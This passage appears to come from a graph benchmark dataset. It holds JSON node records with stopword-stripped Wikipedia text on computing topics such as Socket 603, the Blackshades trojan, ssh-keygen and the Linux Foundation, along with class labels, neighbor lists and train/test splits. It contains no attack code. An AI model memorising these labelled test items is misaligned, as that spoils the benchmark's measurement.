    "text": "Socket_603:socket 603 socket 603 motherboard socket intel xeon processor socket 603 designed intel zero insertion force socket intended workstations server platforms contains 603 contacts arrayed grid center socket contact 1.27mm pitch regular pin array mate 603-pin processor package intel design notes distinguish socket 603 socket 604 low cost low risk robust high volume manufacturable multi-sourceable socket 603 processors bus speed 400 mhz manufactured either 180 nm process 130 nm process socket 603 processors inserted socket 604 designed motherboards socket 604 processors inserted socket 603 designed motherboards due one additional pin present socket 603 processors range 1.4 ghz 3.2 ghz old link http //www.intel.com/assets/pdf/designguide/249672.pdf 11/19/2016 http //www.intel.com/content/dam/www/public/us/en/documents/design-guides/603-pin-socket-guidelines.pdf",
    "neighbors": [
      3588,
      5901,
      5523,
      4246,
      2455,
      3992,
      8855,
      11417,
      4252,
      6175,
      7714,
      10019,
      4523,
      2604,
      2350,
      6192,
      9649,
      4537,
      7105,
      4805,
      7110,
      8394,
      3403,
      4427,
      4179,
      3798,
      4185,
      7002,
      9945,
      11484,
      9570,
      10468,
      613,
      8552,
      7657,
      1260,
      4717,
      10225,
      371,
      9592,
      8442
    ],
    "mask": "Test"
  },
  {
    "node_id": 3996,
    "label": 4,
    "text": "Blackshades:blackshades blackshades name malicious trojan horse used hackers control infected computers remotely malware targets computers using microsoft windows -based operating systems according us officials 500,000 computer systems infected worldwide software 2014 united states federal bureau investigation fbi arrested hundreds people blackshade computer fbi crackdown blackshades sold us 40 hack forums reportedly generated us 350,000.00 sales blackshades infects computer systems downloading onto victim computer victim accesses malicious webpage sometimes downloading onto victim computer without victim knowledge known drive-by download external storage devices usb flash drives blackshades also included tools assisted hackers maximizing amount computer systems infected tool sends infected links masquerade innocuous site potential victims via victim social networking service blackshades reportedly used remotely access infected computer without authorization blackshades allows hackers perform many actions infected computer remotely without authorization including ability blackshades reportedly used computer hackers little experience script kiddies hackers use programs developed others attack computer systems blackshades also act ransomware hackers using blackshades restrict access victim computer demand ransom paid hacker order restriction lifted many antivirus programs successfully detect remove blackshades however hackers using blackshades software usually avoid detection blackshades infections using software obfuscates blackshades binary avoid detection antivirus programs blackshades organization also sold along blackshades software 2012 citizen lab eff reported use blackshades target opposition forces syria 2015 stefan rigo leeds given 40-week suspended sentence using blackshades 14 people 7 knew personally reported paid software using ex-girlfriend payment card 2012 fbi ran sting operation called operation card shop led 24 arrests hackers eight countries one arrested michael hogue also known xvisceral online hacking communities hogue co-creator blackshades arrested indicted charges commonly known computer fraud abuse act sentenced five years probation 20 years suspended prison sentence 2014 fbi coordinated worldwide operation combat use malware leading arrest almost one hundred people nineteen countries may 19 charges laid united states five individuals two men identified developers blackshades three men sold software used infiltrate people computers exactly 359 searches conducted 1,100 electronic devices seized part operation according fbi 500,000 computers 100 countries infected malware blackshades sold typically us 40 reportedly generated us 350,000 sales",
    "neighbors": [
      3555,
      10756,
      2213,
      4903,
      9227,
      8172,
      6797,
      7983,
      1970,
      4883,
      8978,
      4725,
      1271,
      4956
    ],
    "mask": "None"
  },
  {
    "node_id": 3997,
    "label": 8,
    "text": "WCF_Data_Services:wcf data services wcf data services formerly ado.net data services codename astoria platform microsoft calls data services actually combination runtime web service services exposed also includes data services toolkit lets astoria data services created within asp.net astoria project announced mix 2007 first developer preview made available april 30 2007 first ctp made available part asp.net 3.5 extensions preview final version released part service pack 1 .net framework 3.5 august 11 2008 name change ado.net data services wcf data services announced 2009 pdc wcf data services exposes data represented entity data model edm objects via web services accessed http data addressed using rest-like uri data service accessed via http get method uri return data web service configured return data either plain xml json rdf+xml initial release formats like rss atom supported though may future addition using http methods like put post delete data updated well post used create new entities put updating entity delete deleting entity windows communication foundation wcf comes rescue find able achieve want achieve using web services i.e. protocols support even duplex communication wcf define service configure way used via http tcp ipc even message queues consume web services using server side scripts asp.net javascript object notations json even rest representational state transfer understanding basics say wcf service used communicate using different protocols different kinds applications need understand achieve want use wcf service application three major questions 1.where wcf service located client perspective 2.how client access service i.e. protocols message formats 3.what functionality service providing clients answer three questions creating consuming wcf service lot easier us wcf service concept endpoints wcf service provides endpoints client applications use communicate wcf service answer questions known abc wcf services fact main components wcf service let tackle question one one address like webservice wcf service also provides uri used clients get wcf service uri called address wcf service solve first problem locate wcf service us binding able locate wcf service one think communicate service protocol wise binding defines wcf service handles communication could also define communication parameters like message encoding etc solve second problem communicate wcf service us contract question one left functionalities wcf service provides contract defines public data interfaces wcf service provides clients uris representing data contain physical location service well service name also need specify edm entity-set specific entity instance respectively former list entities collection set whereas latter list entity indexed someartist uris also specify traversal relationship entity data model example traverses relationship genre sql parlance joins genre table retrieves instances genre associated entity somesong simple predicates also specified uri like fetch items indexed someartist release 2006 filtering partition information also encoded url although presence skip top keywords indicates paging support data services version 1 method determining number records available thus impossible determine many pages may odata 2.0 spec adds support count path segment return count entities inlinecount retrieve page worth entities total count without separate round-trip ...",
    "neighbors": [
      4384,
      2145,
      10624,
      1347,
      1348,
      9348,
      10020,
      4231,
      11559,
      2603,
      3821,
      9263,
      3573,
      4853,
      3224,
      9434,
      9726,
      479
    ],
    "mask": "Train"
  },
  {
    "node_id": 3998,
    "label": 0,
    "text": "Language_model:language model statistical language model probability distribution sequences words given sequence say length assigns probability formula_1 whole sequence language model provides context distinguish words phrases sound similar example american english phrases recognize speech wreck nice beach sound similar mean different things data sparsity major problem building language models possible word sequences observed training one solution make assumption probability word depends previous n words known n -gram model unigram model n 1 unigram model also known bag words model estimating relative likelihood different phrases useful many natural language processing applications especially generate text output language modeling used speech recognition machine translation part-of-speech tagging parsing optical character recognition handwriting recognition information retrieval applications speech recognition sounds matched word sequences ambiguities easier resolve evidence language model integrated pronunciation model acoustic model language models used information retrieval query likelihood model separate language model associated document collection documents ranked based probability query q document language model formula_2 commonly unigram language model used purpose unigram model treated combination several one-state finite automata splits probabilities different terms context e.g formula_3 formula_4 model probability word depends word probability document one-state finite automata units automaton probability distribution entire vocabulary model summing 1 following illustration unigram model document probability generated specific query calculated different documents unigram models different hit probabilities words probability distributions different documents used generate hit probabilities query documents ranked query according probabilities example unigram models two documents information retrieval contexts unigram language models often smoothed avoid instances p term 0 common approach generate maximum-likelihood model entire collection linearly interpolate collection model maximum-likelihood model document smooth model n -gram model probability formula_1 observing sentence formula_8 approximated assumed probability observing word w context history preceding − 1 words approximated probability observing shortened context history preceding n − 1 words n order markov property conditional probability calculated n -gram model frequency counts terms bigram trigram language models denote n -gram models n 2 n 3 respectively typically n -gram model probabilities derived directly frequency counts models derived way severe problems confronted n -grams explicitly seen instead form smoothing necessary assigning total probability mass unseen words n -grams various methods used simple add-one smoothing assign count 1 unseen n -grams uninformative prior sophisticated models good-turing discounting back-off models bidirectional representations condition pre- post- context e.g. words layers bigram n 2 language model probability sentence saw red house approximated whereas trigram n 3 language model approximation note context first n – 1 n -grams filled start-of-sentence markers typically denoted nowiki /nowiki additionally without end-of-sentence marker probability ungrammatical sequence *i saw would always higher longer sentence saw red house maximum entropy language models encode relationship word n-gram history using feature functions equation formula_13 formula_14 partition function formula_15 parameter vector formula_16 feature function simplest case feature function indicator presence certain n-gram helpful use prior formula_15 form regularization log-bilinear model another example exponential language model neural language models continuous space language models use continuous representations embeddings words make predictions models make use neural networks continuous space embeddings help alleviate curse dimensionality language modeling language models trained larger larger texts number unique words vocabulary increases number possible sequences words increases exponentially size vocabulary causing data sparsity problem exponentially many sequences thus statistics needed properly estimate probabilities neural networks avoid problem representing words distributed way non-linear combinations weights neural net alternate description neural net approximates language function neural net architecture might feed-forward recurrent former simpler latter common typically neural net language models constructed trained probabilistic classifiers learn predict probability distribution i.e. network trained predict probability distribution vocabulary given linguistic context done using standard neural net training algorithms stochastic gradient descent backpropagation context might fixed-size window previous words network predicts feature vector representing previous words another option use future words well past words features estimated probability third option allows faster training invert previous problem make neural network learn context given word one maximizes log-probability called skip-gram language model basis word2vec program instead using neural net language models produce actual probabilities common instead use distributed representation encoded networks hidden layers representations words word mapped onto -dimensional real vector called word embedding size layer output layer representations skip-gram models distinct characteristic model semantic relations words linear combinations capturing form compositionality example models function maps word -d vector representation ≈ made precise stipulating right-hand side must nearest neighbor value left-hand side positional language model assesses probability given words occurring close one another text necessarily immediately adjacent similarly bag-of-concepts models leverage semantics associated multi-word expressions buy_christmas_present even used information-rich sentences like today bought lot nice christmas presents various data sets developed use evaluate language processing systems include",
    "neighbors": [
      3808,
      6336,
      867,
      1443,
      5635,
      7780,
      9798,
      264,
      2602,
      2858,
      3635,
      1044,
      4468,
      5399,
      6362,
      7164,
      10557,
      3646
    ],
    "mask": "Train"
  },
  {
    "node_id": 3999,
    "label": 3,
    "text": "Joule_(programming_language):joule programming language joule concurrent dataflow programming language designed building distributed applications concurrent order statements within block irrelevant operation block statements executed whenever possible based inputs everything joule happens sending messages control flow instead programmer describes flow data making dataflow programming language considered precursor e programming language numerals consist ascii digits 0-9 identifiers unicode sequences digits letters operator characters begin letter also possible form identifiers using unicode sequences including whitespace enclosed either straight standard ‘ ’ single quotes backslash escape character keywords start letter except • keyword send information operators consist unicode sequences digits letters operator characters beginning operator character labels identifiers followed colon root joule imperative language statement-based language rich expression syntax transforms easily relational syntax underneath complex expressions become separate statements site original expression replaced reference acceptor results channel therefore nested expressions still compute completely concurrently embedding statement identifiers may name channel communicate server case said bound channel",
    "neighbors": [
      256,
      9345,
      2951,
      9224,
      6813,
      10146,
      547,
      7480,
      10813,
      4417,
      4034,
      8262,
      7884,
      11596,
      10835,
      6102,
      728,
      5483,
      8435,
      3700,
      10614,
      2936,
      5503
    ],
    "mask": "None"
  },
  {
    "node_id": 4000,
    "label": 8,
    "text": "Jello_framework:jello framework jello end-to-end java application framework optimized google app engine including comprehensive data authorization model powerful restful engine out-of-the-box ui views jello rest offers clean simple follow json format protocol schema follows odata specification following components part jello framework",
    "neighbors": [
      11105,
      9467,
      5677
    ],
    "mask": "Test"
  },
  {
    "node_id": 4001,
    "label": 2,
    "text": "Ssh-keygen:ssh-keygen ssh-keygen standard component secure shell ssh protocol suite found unix unix-like microsoft windows computer systems used establish secure shell sessions remote computers insecure networks use various cryptographic techniques ssh-keygen utility used generate manage convert authentication keys ssh-keygen able generate key using one three different digital signature algorithms help ssh-keygen tool user create passphrase keys key types provide unattended operation passphrase left empty increased risk keys differ keys used related tool gnu privacy guard openssh-based client server programs included windows 10 since version 1803 ssh client key agent enabled available default ssh server optional feature-on-demand originally ssh protocol version 1 deprecated rsa algorithm supported 2016 rsa still considered strong recommended key length increased time ssh protocol version 2 additionally introduced support dsa algorithm dsa algorithm ties american national security agency nsa aspects security called question edward snowden global surveillance disclosures particularly light bullrun decryption program subsequently openssh added support third digital signature algorithm ecdsa key format longer uses previous pem file format private keys depend upon openssl library provide cryptographic implementation fourth format supported using ed25519 originally developed independent cryptography researcher daniel j. bernstein syntax ssh-keygen command follows important options ssh-keygen command follows ssh-keygen utility uses various files storing public private keys files used ssh-keygen utility follows",
    "neighbors": [
      2050,
      515,
      3970,
      8834,
      9733,
      9735,
      2568,
      3976,
      6281,
      10631,
      6797,
      4750,
      3856,
      6674,
      5397,
      2198,
      4248,
      8729,
      6812,
      4771,
      3495,
      808,
      7847,
      4398,
      7983,
      7088,
      10033,
      9780,
      1336,
      1978,
      7356,
      5437,
      7486,
      10428,
      960,
      965,
      8517,
      8522,
      3659,
      1741,
      4174,
      7887,
      7893,
      1750,
      11221,
      9946,
      10341,
      10727,
      6120,
      9320,
      6506,
      9709,
      1647,
      9839,
      2545,
      4850,
      7411,
      5492,
      8692,
      9204,
      11249,
      6138,
      6396,
      2045,
      5759
    ],
    "mask": "Test"
  },
  {
    "node_id": 4002,
    "label": 2,
    "text": "Berkeley_printing_system:berkeley printing system berkeley printing system one several standard architectures printing unix platform originated 2.10bsd used bsd derivatives freebsd netbsd openbsd dragonfly bsd system running print architecture could traditionally identified use user command lpr primary interface print system opposed system v printing system lp command typical user commands available berkeley print system lpd program daemon programs communicate programs support line printer daemon protocol machines network submit jobs print queue machine running berkeley printing system berkeley printing system user commands submit jobs machines support protocol",
    "neighbors": [
      3976,
      8360,
      7626,
      3916,
      10352,
      5492
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4003,
    "label": 2,
    "text": "Nokia_E65:nokia e65 nokia e65 smartphone eseries range s60 platform third edition device slide action shared many features n95 quad band gsm 3g wifi bluetooth released around time thinner lighter without gps followed fairly quickly e66 similar gained fm radio newer release s60 a2dp bluetooth gps 3.2 mpixel camera operation times vary depending network usage many users experienced problems sim connecting network using phone time bring phone nokia center get phone repaired replaced cause seems design problem sim container chassis phone sim container mainly built thin metal foil time tends bend thus disconnecting sim mobile phone sim contacts problem apparently solved putting bit paper metal foil sim enabling make contact also difficulties making connection wlan networks use eap-peap mschapv2 protocols update phone firmware true firmware version 3.0633.69 users experience problems phone connecting third party gps devices bluetooth seems compatibility flaw nokia bluetooth stack nokia maps devices connect well used google maps e65",
    "neighbors": [
      1537,
      8577,
      3205,
      11655,
      9359,
      1424,
      529,
      2449,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      1776,
      8433,
      1533
    ],
    "mask": "None"
  },
  {
    "node_id": 4004,
    "label": 2,
    "text": "Marionnet:marionnet marionnet virtual network laboratory allows users define configure run complex computer networks without need physical setup single possibly even non-networked gnu/linux host machine required simulate whole ethernet network complete computers routers hubs switches cables support also provided integrating virtual network physical host network marionnet born april 2005 simple textual interface netkit written ocaml jean-vincent loddo paris 13 university networking course code since completely rewritten redesigned september 2005 order remove dependency netkit ease construction graphical interface partly built dot architecture extended system made general luca saiu joined project 2007 contributing particular dynamic reconfiguration aspects system active use several universities metropolitan france countries marionnet reached fairly stable state successfully used teaching networks several universities around world current development centered around making system easier use average end user particular emphasis documentation internationalization way mostly marionnet_i18n branch gnu gettext far marionnet presented two international computer science conferences many french events fosdem top gnu/linux host emulation guest machines achieved user mode linux technology allows run many linux kernels user space regular processes vde virtual distributed ethernet project responsible linking together uml machines virtual network purpose emulate cable hub switch devices allowing also introduce perturbations communication top raw emulated network marionnet acts coherent manager gui marionnet example complex concurrent application written functional language using relatively advanced programming techniques marionnet showed good performance complex networks ~15 machines even relatively old machines remaining responsive main concern disk usage largely depends distribution choice pinocchio custom distro developed meet average needs main goal marionnet teaching computers networks university laboratories although could valuable tool also high schools despite teaching-oriented marionnet may used emulate networks test development purposes quite easy set fast even complicated configurations possibility reverting filesystem changes virtual machines makes quite flexible",
    "neighbors": [
      5120,
      4734,
      7983
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4005,
    "label": 4,
    "text": "Network_mapping:network mapping network mapping study physical connectivity networks e.g internet network mapping discovers devices network connectivity confused network discovery network enumerating discovers devices network characteristics operating system open ports listening network services etc. field automated network mapping taken greater importance networks become dynamic complex nature images first attempts large scale map internet produced internet mapping project appeared wired magazine maps produced project based layer 3 ip level connectivity internet see osi model different aspects internet structure also mapped recent efforts map internet improved sophisticated methods allowing make faster sensible maps example effort opte project attempting develop system capable mapping internet single day map internet project maps 4 billion internet locations cubes 3d cyberspace users add urls cubes re-arrange objects map early 2011 canadian based isp peer 1 hosting created map internet depicts graph 19,869 autonomous system nodes connected 44,344 connections sizing layout autonomous systems calculated based eigenvector centrality measure central network autonomous system graph theory used better understand maps internet help choose many ways visualize internet maps projects attempted incorporate geographical data internet maps example draw locations routers nodes map world others concerned representing abstract structures internet allocation structure purpose ip space many organizations create network maps network system maps made manually using simple tools microsoft visio mapping process simplified using tools integrate auto network discovery network mapping one example ip fabric platform many vendors notable network mappers list enable customize maps include labels add un-discoverable items background images sophisticated mapping used help visualize network understand relationships end devices transport layers provide service items bottlenecks root cause analysis easier spot using tools three main techniques used network mapping snmp based approaches active probing route analytics snmp based approach retrieves data router switch mibs order build network map active probing approach relies series traceroute-like probe packets order build network map route analytics approach relies information routing protocols build network map three approaches advantages disadvantages methods use two prominent techniques used today create internet maps first works data plane internet called active probing used infer internet topology based router adjacencies second works control plane infers autonomous system connectivity based bgp data bgp speaker sends 19-byte keep-alive messages every 60 seconds maintain connection technique relies traceroute-like probing ip address space probes report back ip forwarding paths destination address combining paths one infer router level topology given pop active probing advantageous paths returned probes constitute actual forwarding path data takes networks also likely find peering links isp however active probing requires massive amounts probes map entire internet likely infer false topologies due load balancing routers routers multiple ip address aliases decreased global support enhanced probing mechanisms source-route probing icmp echo broadcasting ip address resolution techniques leaves type probing realm network diagnosis technique relies various bgp collectors collect routing updates tables provide information publicly bgp entry contains path vector attribute called path path represents autonomous system forwarding path given origin given set prefixes paths used infer as-level connectivity turn used build topology graphs however paths necessarily reflect data actually forwarded adjacencies nodes represent policy relationship single link reality several router links also much harder infer peerings two nodes peering relationships propagated isp customer networks nevertheless support type mapping increasing isp offer peer public route collectors route-views ripe new toolsets emerging cyclops netviews take advantage new experimental bgp collector bgpmon netviews build topology maps seconds visualize topology changes moments occurring actual router hence routing dynamics visualized real time comparison tools using bgpmon another tool nettransformer able discover generate bgp peering maps either snmp polling converting mrt dumps graphml file format nettransformer allows us also perform network diffs two dumps thus reason bgp peering evolved years whatsup gold monitoring tool tracks networks servers applications storage devices virtual devices incorporates infrastructure management application performance management",
    "neighbors": [
      5472,
      2085,
      4005,
      6172,
      7983,
      11249,
      2739,
      5402,
      5469,
      3133,
      9983
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4006,
    "label": 9,
    "text": "KeY:key key tool used formal verification java programs accepts specifications written java modeling language java source files transformed theorems dynamic logic compared program semantics likewise defined terms dynamic logic key significantly powerful supports interactive i.e hand fully automated correctness proofs failed proof attempts used efficient debugging verification-based testing several extensions key order apply verification c programs hybrid systems key jointly developed karlsruhe institute technology germany technische universität darmstadt germany chalmers university technology gothenburg sweden licensed gpl usual user input key consists java source file annotations jml translated key internal representation dynamic logic given specifications several proof obligations arise discharged i.e proof found ends program symbolically executed resulting changes program variables stored so-called updates program processed completely remains first-order logic proof obligation heart key system lies first-order theorem prover based sequent calculus used close proof interference rules captured called taclets consist simple language describe changes sequent theoretical foundation key formal logic called java card dl dl stands dynamic logic version first-order dynamic logic tailored java card programs example allows statements formulas like formula_1 intuitively says post-condition formula_2 must hold program states reachable executing java card program formula_3 state satisfies pre-condition formula_4 equivalent formula_5 hoare calculus formula_4 formula_2 purely first order dynamic logic however extends hoare logic formulas may contain nested program modalities formula_8 quantification formulas contain modalities possible also dual modality formula_9 includes termination dynamic logic seen special multi-modal logic infinite number modalities java block formula_3 modalities formula_8 formula_9 heart key system lies first-order theorem prover based sequent calculus sequent form formula_13 formula_14 assumptions formula_15 propositions sets formulas intuitive meaning formula_16 holds true means deduction initial sequent representing proof obligation shown constructible fundamental first-order axioms equality formula_17 program modalities eliminated symbolic execution instance formula formula_18 logically equivalent formula_19 example shows symbolic execution dynamic logic similar calculating weakest preconditions formula_20 formula_21 essentially denote thing – two exceptions firstly formula_22 function meta-calculus formula_20 really formula given calculus secondly symbolic execution runs program forward actual execution would save intermediate results assignments key introduces concept called updates similar substitutions applied program modality fully eliminated syntactically updates consist parallel side-effect free assignments written curly braces front modality example symbolic execution updates formula_24 transformed formula_25 first step formula_26 second step modality empty backwards application update postcondition yields precondition formula_27 could take value suppose one wants prove following method calculates product non-negative integers formula_27 formula_29 one thus starts proof premise formula_30 to-be-shown conclusion formula_31 note tableaux sequent calculi usually written upside-down i.e. starting sequent appears bottom deduction steps go upwards proof seen figure right symbolic execution debugger visualizes control flow program symbolic execution tree contains feasible execution paths program certain point provided plugin eclipse development platform key usable model-based testing tool generate unit tests java programs model test data test case derived consists formal specification provided jml symbolic execution tree implementation test computed key system key free software written java licensed gpl downloaded project website source currently pre-compiled binaries available another possibility key executed directly via java web start without need compilation installation key-hoare built top key features hoare calculus state updates state updates means describing state transitions kripke structure calculus seen subset one used main branch key due simplicity hoare calculus implementation essentially meant exemplify formal methods undergraduate classes keymaera previously called hykey deductive verification tool hybrid systems based calculus differential dynamic logic dl extends key tool computer algebra systems like mathematica corresponding algorithms proof strategies used practical verification hybrid systems keymaera developed university oldenburg carnegie mellon university name tool chosen homophone chimera hybrid animal ancient greek mythology keymaerax developed carnegie mellon university successor keymaera completely rewritten key c adaption key system misra c subset c programming language variant longer supported also adaptation use key symbolic execution abstract state machines developed eth zürich variant longer supported information found weblink",
    "neighbors": [
      5677,
      2045,
      4006,
      7983
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4007,
    "label": 4,
    "text": "William_F._Friedman:william f. friedman william frederick friedman september 24 1891 – november 12 1969 us army cryptographer ran research division army signal intelligence service sis 1930s parts follow-on services 1950s 1940 subordinates led frank rowlett broke japan purple cipher thus disclosing japanese diplomatic secrets america entrance world war ii friedman born wolf friedman chişinău bessarabia son frederick friedman jew bucharest worked translator linguist russian postal service daughter well-to-do wine merchant friedman family fled russia 1892 escape virulent anti-semitism ending pittsburgh pennsylvania three years later first name changed william child friedman introduced cryptography short story gold-bug edgar allan poe studied michigan agricultural college known today michigan state university east lansing received scholarship work genetics cornell university meanwhile george fabyan ran private research laboratory study personally interesting project decided set genetics project referred friedman friedman joined fabyan riverbank laboratories outside chicago september 1915 head department genetics one projects ran studied effects moonlight crop growth experimented planting wheat various phases moon another fabyan pet projects research secret messages sir francis bacon allegedly hidden various texts reigns elizabeth james research carried elizabeth wells gallup believed discovered many messages works william shakespeare convinced bacon written many shakespeare works friedman become something expert photographer working projects asked travel england several occasions help gallup photograph historical manuscripts research became fascinated work courted elizebeth smith gallup assistant accomplished cryptographer married soon became director riverbank department codes ciphers well department genetics time friedman wrote series 23 papers cryptography collectively known riverbank publications including first description index coincidence important mathematical tool cryptanalysis entry united states world war fabyan offered services department codes ciphers government federal department existed kind work although army navy embryonic departments various times soon riverbank became unofficial cryptographic center us government period friedmans broke code used german-funded indian radicals us planned ship arms india gain independence britain analyzing format messages riverbank realized code based dictionary sort cryptographic technique common time friedmans soon managed decrypt messages long case come trial book come light german-english dictionary published 1880 united states government decided set cryptological service sent army officers riverbank train friedman support program friedman wrote series technical monographs completing seven early 1918 enlisted army went france serve personal cryptographer general john j. pershing returned us 1920 published eighth monograph index coincidence applications cryptography considered important publication modern cryptography time texts army cryptographic training well thought remained classified several decades 1921 became chief cryptanalyst war department later led signals intelligence service sis —a position kept quarter century 1929 american black chamber new york city disbanded files entrusted sis cryptographic intelligence services reorganized suit new position war department friedman coined several terms including cryptanalysis wrote many monographs cryptography one written mostly spare time first draft elements cryptanalysis later expanded four volumes became u.s. army cryptographic main textbook reference realizing mathematical language skills essential sis work friedman managed get authority hire three men mathematical training language knowledge solomon kullback frank rowlett abraham sinkov went distinguished service decades addition also finally able hire man fluent japanese john hurt period elizebeth friedman continued work cryptology became famous number trials involving rum-runners coast guard fbi prohibition 1920s several new cipher machines developed generally based using typewriter mechanics basic electrical circuitry early example hebern rotor machine designed us 1915 edward hebern system offered security simplicity use hebern heavily promoted investors friedman realized new rotor machines would important devoted time analyzing hebern design period years developed principles analysis discovered several problems common rotor-machine designs examples dangerous features allowed cracking generated code included rotors step one position keypress putting fastest rotor one turns every keypress either end rotor series case collecting enough ciphertext applying standard statistical method known kappa test showed could albeit great difficulty crack cipher generated machine friedman used understanding rotor machines develop several immune attacks best lot sigaba—which destined become us highest-security cipher machine world war ii—was co-invented frank rowlett least one patent related finally granted friedman died 1939 japanese introduced new cipher machine sensitive diplomatic traffic replacing earlier system sis referred red new cipher sis called purple different much difficult navy cryptological unit op-20-g sis thought might related earlier japanese cipher machines agreed sis would handle attack system several months trying discover underlying patterns purple ciphertexts sis team led friedman rowlett extraordinary achievement figured purple unlike german enigma hebern design use rotors stepper switches like automated telephone exchanges leo rosen sis built machine — later discovered using identical model switch japanese designer chosen thus end 1940 sis constructed exact analog purple machine without ever seen one duplicate machines understanding purple sis could decrypt increasing amounts japanese traffic one intercept message japanese embassy washington d.c. ordering end december 7 1941 negotiations us message gave clear indication impending war delivered us state department hours prior attack pearl harbor controversy whether us foreknowledge pearl harbor attack roiled well 21st century 1941 friedman hospitalized nervous breakdown widely attributed mental strain work purple remained hospital four-man team — abraham sinkov leo rosen sis lt. prescott currier lt. robert weeks u.s. navy op-20-g — visited british establishment government code cypher school bletchley park gave british purple machine exchange details design enigma machine british decrypted enigma cipher however friedman visited bletchley park april 1943 played key role drawing 1943 brusa agreement. ref name=bletchleyparkdiary-2013",
    "neighbors": [
      6755,
      11397,
      6599,
      7275,
      6572,
      173,
      4719,
      6928,
      7887,
      6578,
      9615,
      2580,
      1941,
      5310
    ],
    "mask": "None"
  },
  {
    "node_id": 4008,
    "label": 4,
    "text": "Elm_information_security:elm information security elm saudi joint stock company owned public investment fund pif investment arm saudi ministry finance elm services provided forms beneficiaries including government corporate sector individuals elm services provided following sectors",
    "neighbors": [
      5373
    ],
    "mask": "None"
  },
  {
    "node_id": 4009,
    "label": 4,
    "text": "POP_before_SMTP:pop smtp pop smtp smtp pop method authentication used mail server software helps allow users option send e-mail location long demonstrably also fetch mail place pop smtp approach superseded smtp authentication due smtp authentication widely used recent years purposes technically users allowed use smtp ip address long previously made successful login pop service mail hosting provider address within predefined timeout period main advantage process generally transparent average user connecting email client almost always make connection fetch new mail sending new mail disadvantages include potentially complex setup mail hosting provider requiring sort communication channel pop service smtp service uncertainty much time users take connect via smtp send mail connecting pop users handled method need resort authorization methods also cases users come externally controlled dynamically assigned addresses smtp server must careful giving much leeway allowing unauthorized connections possibility race conditions leaving open mail relay unintentionally exposed",
    "neighbors": [
      1125,
      6184,
      10167,
      9909,
      823,
      5433,
      5435
    ],
    "mask": "Test"
  },
  {
    "node_id": 4010,
    "label": 2,
    "text": "Web_Platform_Installer:web platform installer web platform installer web pi freeware closed-source package management system installs non-commercial development tools dependencies part microsoft web platform including ability install third-party software added version 2.0 released september 24 2009. web pi install 82 titles web pi 2.0 options populated dynamically runtime microsoft servers allowing installation options updated without need download newer versions web pi july 7 2010 microsoft announced web pi 3 includes webmatrix new set integrated tools web development web pi 3 installs additional tools web development including iis developer express sql server compact dotnetnuke web pi features offline mode products downloaded local cache machine internet access available use cached files different machine later however web pi still usable environments internet connectivity local administrator privileges mutually exclusive i.e given process either authenticate transparent proxy high system integrity level",
    "neighbors": [
      5380,
      10900,
      10902,
      11030,
      3224,
      537,
      5401,
      7064,
      11414,
      4384,
      9121,
      8227,
      11683,
      11559,
      10157,
      7983,
      9263,
      11570,
      6709,
      8246,
      315,
      10939,
      7486,
      4674,
      1347,
      1348,
      8644,
      4423,
      5320,
      1353,
      5067,
      10828,
      4174,
      847,
      83,
      1366,
      4439,
      9434,
      603,
      608,
      2401,
      8161,
      7523,
      3303,
      4074,
      11498,
      5356,
      3821,
      10991,
      3573,
      9205,
      5754,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 4011,
    "label": 2,
    "text": "Linux_Foundation:linux foundation linux foundation lf non-profit technology consortium founded 2000 merger open source development labs free standards group standardize linux support growth promote commercial adoption also hosts promotes collaborative development open source software projects began 2000 open source development labs osdl became organization today osdl merged free standards group fsg linux foundation sponsors work linux creator linus torvalds lead maintainer greg kroah-hartman supported members cisco fujitsu hitachi huawei ibm intel microsoft nec oracle qualcomm samsung vmware well developers around world recent years linux foundation expanded services events training certification open source projects projects hosted linux foundation include open network automation platform onap hyperledger cloud native computing foundation cloud foundry foundation xen project many others origins linux foundation traced 1993 patrick d'cruze started linux international email list known li 1993 comdex bob young introduced mark bolzern li list shortly thereafter bolzern shared vision asked make members list bolzern funded li activities others eventually joined vision defined among things entity deal traditional public relations behalf linus torvalds file trademark behalf linus among many things described bolzern direction li became collaboration linux related vendors technologists heading single direction served everyone entire linux movement according original vision became clear bolzern could continue ceo workgroup solutions/linuxmall executive director linux international time perceived conflict interest mid 1994 bolzern young recruited jon maddog hall executive director position turn filed corporate paperwork behalf new board directors bolzern also remained board well continued leading trade show marketing efforts late 1999 included many trips press relations user groups bolzern maddog bolzern also organized managed launch linux pavilions major trade shows time uniforum comdex usenix eventually maddog helping establish atlanta linux showcase helped larry augustin li board member silicon valley linux user group create san francisco linux expo especially notable 94–98 timeframe anti-fraud linux trademark filing led li already included li suite projects mid 90s linux mark institute linux base standard certification programs trade show press relationships along actually vendor association page outlining linux international membership latter half 90s list presented alphabetical agreed order merit li linux bolzern maddog continued provide bulk funding 1998 augmented vendor individual membership fees individuals sponsors joined li vision 1999 li already become vendor-neutral 501c6 non-profit industry association linux linus torvalds blessing linus focused development technical excellence linux li primary purpose industry marketing organization also supported linux related certification programs along development essential projects education vision huge large vendors began come party expected sophistication thus help needed even bolzern distracted wife diagnosed cancer maddog becoming weary load everyone support augustin took action suggested another organization formed continue 2000 osdl founded appealing linux international board directors number fundamental projects still part linux foundation today osdl non-profit organization supported global consortium aimed accelerate deployment linux enterprise computing recognized center-of-gravity linux industry 9 jon maddog hall went different direction li.org 2003 linus torvalds creator freely available linux kernel announced would join organization osdl fellow work full-time future versions linux 2007 osdl merged free standards group another organization promoting adoption linux time jim zemlin headed fsg took executive director linux foundation remains today september 11 2011 linux foundation website taken due breach discovered 27 days prior including limited attendant subdomains linux foundation linux.com major parts including openprinting still offline october 20 2011 restoration complete january 4 2012 although one site linux developer network restored march 2014 linux foundation announced would begin building mooc program nonprofit education platform edx aim collaboration serve rapidly growing demand linux expertise vehicle available anyone anywhere world time point first offering basic introduction linux course library since expanded include intro cloud infrastructure technologies intro devops intro openstack november 16 2016 linux foundation announced microsoft traditionally seen competitor joined organization platinum member 